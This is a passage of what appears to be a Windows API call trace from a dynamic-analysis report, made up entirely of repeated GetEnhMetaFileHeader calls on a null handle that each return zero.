lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.857] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.858] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.859] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.860] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.860] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.860] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.860] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.860] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.860] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.860] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.860] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.860] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.860] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.860] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.860] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.860] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.860] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.860] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.860] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.860] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.860] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.860] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.860] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.860] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.860] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.860] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.860] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.860] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.860] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.860] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.860] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.860] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.860] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: lpEnhMetaHeader=0x12fe68) returned 0x0 [0107.860] GetEnhMetaFileHeader (in: hemf=0x0, nSize=0x0, lpEnhMetaHeader=0x12fe68 | out: 